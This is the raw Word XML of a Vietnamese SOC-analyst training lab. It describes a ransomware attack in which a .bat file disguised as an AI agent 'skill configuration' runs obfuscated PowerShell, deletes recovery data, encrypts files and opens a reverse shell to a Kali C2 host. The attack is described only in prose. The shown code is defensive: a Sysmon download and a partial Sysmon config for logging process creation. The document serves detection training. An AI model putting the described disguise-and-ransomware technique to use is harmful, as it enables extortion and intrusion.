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7F3A" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000" w:rsidP="00AC2AC8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc234664893"/>
      <w:r w:rsidRPr="006B64B5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Kịch bản 2: NGƯỜI DÙNG TẢI FILE CẤU HÌNH SKILL CHO AI AGENT CÓ CHỨA MÃ HÓA RANSOMWARE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="2CA56659" w14:textId="77777777" w:rsidR="009D6A35" w:rsidRDefault="009D6A35" w:rsidP="009D6A35">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C9432B5" w14:textId="529B58AA" w:rsidR="009D6A35" w:rsidRPr="009D6A35" w:rsidRDefault="009D6A35" w:rsidP="009D6A35">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B065827" wp14:editId="60543015">
            <wp:extent cx="5733415" cy="1663700"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="16097287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9138" b="47333"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="1663700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="426EB70D" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc234664894"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>1. Mô tả tình huống</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="2C71458A" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2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tiêu: Huấn luyện SOC Analyst phát hiện hành vi thực thi tệp .bat chứa độc hại, lệnh gọi PowerShell xáo trộn (obfuscation) và quá trình xóa dữ liệu khôi phục để tiến hành mã hóa tệp tin tống tiền.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1085947B" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2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ngắn: Nhân viên kế toán đang cài đặt AI agent để làm trợ lý cá nhân, nhân viên download 1 file cấu hình cài đặt skill cho AI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9DE1E3" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="20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611217C" wp14:editId="7A3E6750">
            <wp:extent cx="5730875" cy="355600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="78" name="image62.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="78" name="image62.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="355600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EFABF1" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2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Trên máy người dùng, chức năng hiển thị phần mở rộng tệp đang bị tắt. Vì vậy, Windows Explorer không hiển thị đầy đủ tên thật của tệp là: update-Skill-AI.bat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A3F460" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2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chỉ nhìn thấy tên update-Skill-AI và biểu tượng tệp, nên có thể nhầm đây là một tệp cấu hình hoặc trình cài đặt thông thường của AI Agent. Do không kiểm tra thuộc tính tệp và nguồn tải, người dùng nhấp đúp để thực thi. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E2C6B7" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2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ngắn: Nhân viên kế toán đang cài đặt AI agent để làm trợ lý cá nhân, nhân viên download 1 file cấu hình cài đặt skill cho AI, mã được viết trực tiếp trên powershell có chức năng mã hóa và tạo reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEE2B07" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_heading=h.i8sv7cbwt0fz" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="19" w:name="_Toc234664895"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2. Mô hình triển khai Lab</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="64F58F7F" w14:textId="0A58F660" w:rsidR="000D3737" w:rsidRDefault="00C91D84">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E1166D2" wp14:editId="752BF7D4">
            <wp:extent cx="5733415" cy="2439670"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="54865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3415" cy="2439670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8EE0F7" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc234664896"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3. Chuẩn bị môi trường</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Style64"/>
        <w:tblW w:w="9660" w:type="dxa"/>
        <w:jc w:val="center"/>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083"/>
        <w:gridCol w:w="2077"/>
        <w:gridCol w:w="2075"/>
        <w:gridCol w:w="3425"/>
      </w:tblGrid>
      <w:tr w:rsidR="000D3737" w14:paraId="4F1AF35F" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2083" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F5F8"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="735937CC" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="20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VM / Thành phần</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2077" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F5F8"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="40BE85AB" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="20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Hệ điều hành</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2075" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F5F8"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="681AD500" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="20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Vai trò hệ thống</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3425" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F5F8"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="686A3FB5" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="20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Công cụ / Cấu hình cài đặt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D3737" w14:paraId="53F94148" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2083" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="57F75D93"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KETOAN-PC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2077" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="47CDB6FB"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Windows 10/11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2075" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="39F18836"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Endpoint Nạn nhân</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3425" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="02034EF8"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br/>
              <w:t xml:space="preserve">Sysmon, Wazuh Agent, Python, thư viện cryptography </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D3737" w14:paraId="71C9ED4B" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2083" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1C4A420D"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KALI-ATTACK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2077" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="67D49D80"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Kali Linux 2023</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2075" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="62AB1ADA"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C2 Server / Máy tấn công</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3425" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="593217DA"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Python HTTP Server </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D3737" w14:paraId="16E58BFB" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2083" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6AA1540C"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SOC-SIEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2077" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4A224FAA"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Ubuntu Server 22.04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2075" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2156F78A"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giám sát log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3425" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="20632740"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Triển khai Wazuh Manager  nhận log đẩy về từ Endpoint.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A125FC3" w14:textId="689430F2" w:rsidR="00091E90" w:rsidRPr="00AC2AC8" w:rsidRDefault="00000000" w:rsidP="00AC2AC8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_heading=h.by4zp6i8ilk" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="22" w:name="_Toc234664897"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>4. Cấu hình môi trường ban đầu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="76B6C5AC" w14:textId="13060255" w:rsidR="00091E90" w:rsidRPr="00AC2AC8" w:rsidRDefault="00091E90" w:rsidP="00AC2AC8">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091E90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>New-Item -Path C:\Sysmon -ItemType Directory -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCA59A2" w14:textId="77777777" w:rsidR="00091E90" w:rsidRPr="00091E90" w:rsidRDefault="00091E90" w:rsidP="00AC2AC8">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en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00091E90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Invoke-WebRequest `</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DD8952" w14:textId="77777777" w:rsidR="00091E90" w:rsidRPr="00091E90" w:rsidRDefault="00091E90" w:rsidP="00AC2AC8">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en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00091E90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  -Uri "https://download.sysinternals.com/files/Sysmon.zip" `</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B90134" w14:textId="158B1089" w:rsidR="00091E90" w:rsidRPr="00AC2AC8" w:rsidRDefault="00091E90" w:rsidP="00AC2AC8">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091E90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  -OutFile "C:\Sysmon\Sysmon.zip"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486FE52F" w14:textId="77777777" w:rsidR="00091E90" w:rsidRPr="00091E90" w:rsidRDefault="00091E90" w:rsidP="00AC2AC8">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en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00091E90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Expand-Archive `</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B805E2" w14:textId="77777777" w:rsidR="00091E90" w:rsidRPr="00091E90" w:rsidRDefault="00091E90" w:rsidP="00AC2AC8">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en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00091E90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  -Path "C:\Sysmon\Sysmon.zip" `</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C65F5B" w14:textId="77777777" w:rsidR="00091E90" w:rsidRPr="00091E90" w:rsidRDefault="00091E90" w:rsidP="00AC2AC8">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en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00091E90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  -DestinationPath "C:\Sysmon" `</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A44FF01" w14:textId="77777777" w:rsidR="00091E90" w:rsidRPr="00091E90" w:rsidRDefault="00091E90" w:rsidP="00AC2AC8">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en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00091E90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48766ED7" w14:textId="686294C2" w:rsidR="00091E90" w:rsidRDefault="00AC2AC8">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC2AC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Cấu hình Sysmon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395B956E" w14:textId="02EED946" w:rsidR="00AC2AC8" w:rsidRDefault="00AC2AC8">
      <w:pPr>
        <w:spacing w:after="20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Tạo file </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC2AC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>sysmon-ransomware.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3903B98C" w14:textId="77777777"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8A4F40">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>&lt;Sysmon schemaversion="4.90"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0334CEB1" w14:textId="03309820"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8A4F40">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;HashAlgorithms&gt;SHA256&lt;/HashAlgorithms&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC2AA1B" w14:textId="546D610A"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8A4F40">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;EventFiltering&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7604BA4D" w14:textId="77777777"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8A4F40">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;ProcessCreate onmatch="include"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6C1CC7" w14:textId="77777777"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8A4F40">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;Rule groupRelation="or"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0498BB10" w14:textId="77777777"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8A4F40">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;Image condition="end with"&gt;\cmd.exe&lt;/Image&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724D1433" w14:textId="77777777"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8A4F40">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;Image condition="end with"&gt;\powershell.exe&lt;/Image&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120CDBFF" w14:textId="77777777"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8A4F40">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;Image condition="end with"&gt;\python.exe&lt;/Image&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126075AB" w14:textId="77777777"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8A4F40">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
